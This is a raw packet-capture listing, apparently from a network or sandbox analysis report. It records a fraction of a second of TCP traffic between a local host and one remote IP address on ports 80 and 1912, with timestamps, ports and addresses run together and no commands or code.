                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.119585037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.120496035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.120775938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.120956898 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.121582031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.121678114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.121777058 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.122759104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.122827053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.122924089 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.123851061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.123979092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.124201059 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.124916077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.125025988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.125227928 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.126036882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.126133919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.126280069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.127224922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.127298117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.127405882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.128191948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.128314972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.128505945 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.129328012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.129401922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.129795074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.130419970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.130532980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.130705118 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.131556034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.131683111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.131764889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.132638931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.132674932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.132793903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.133801937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.134063005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.134166956 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.134891033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.135061979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.135291100 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.135970116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.136092901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.136177063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.137058973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.137216091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.137470961 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.138206959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.138334990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.138412952 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.139271975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.139398098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.139478922 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.140396118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.194194078 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.260775089 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.274787903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.274919987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.275017023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.275304079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.275398970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.276465893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.276478052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.276521921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.276549101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.277565956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.277683020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.277741909 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.278678894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.278747082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.278804064 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.279735088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.279829979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.280519009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.280827999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.280911922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.280971050 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.281955957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.282069921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.282121897 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.283062935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.283170938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.283231020 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.284136057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.284255981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.284305096 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.285393000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.285489082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.285562038 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.286396980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.286458015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.286636114 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.287492037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.287604094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.287667036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.288536072 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.288634062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.288710117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.289719105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.289791107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.289841890 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.290843964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.290982008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.291080952 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.291906118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.292027950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.292085886 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.292968035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.293076038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.293123960 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.294079065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.294193983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.294250011 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.295677900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.295785904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.295850992 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.296340942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.296495914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.297382116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.297431946 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.297487020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.297542095 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.298580885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.298729897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.299344063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.299698114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.299828053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.299956083 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.300887108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.301014900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.301069975 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.301897049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.302062035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.302114010 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.302941084 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.303082943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.303134918 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.304069996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.304209948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.305160999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.305208921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.305279016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.306211948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.306267023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.306298018 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.306350946 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.307363987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.307513952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.307573080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.308455944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.308645964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.308829069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.309566021 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.309716940 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.310631990 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.310866117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.311017990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.311790943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.311836004 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.311882019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.311928034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.312968969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.313117027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.314121962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.314169884 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.314241886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.314292908 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.315299988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.315392017 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.315448999 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.316186905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.316299915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.316349030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.317318916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.317475080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.317553043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.318450928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.318552971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.318605900 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.319586992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.319746971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.320696115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.320748091 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.320791006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.320828915 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.321964025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.322127104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.322180986 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.323024988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.323172092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.323220015 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.324166059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.324224949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.324284077 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.325160027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.325321913 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.325547934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.326545000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.326683998 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.326731920 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.327367067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.327416897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.328397989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.328473091 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.328627110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.328680992 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.329493999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.329617977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.330616951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.330640078 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.330782890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.331711054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.331772089 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.331878901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.331933022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.332736015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.381609917 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.381906986 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.467109919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.467169046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.467277050 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.467281103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.467410088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.467478037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.468401909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.468497992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.468553066 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.469480991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.469774008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.469818115 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.470637083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.470714092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.470766068 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.471733093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.471874952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.471930027 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.472805023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.472908974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.472961903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.473917007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.473958969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.474009037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.475065947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.475102901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.475152969 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.476181030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.476274014 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.476334095 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.477261066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.477366924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.477416039 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.478367090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.478513002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.478566885 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.479445934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.479614019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.479671955 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.480592966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.480674028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.480724096 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.481653929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.481761932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.481812954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.482794046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.482877970 CET8049738176.111.174.140192.168.2.4
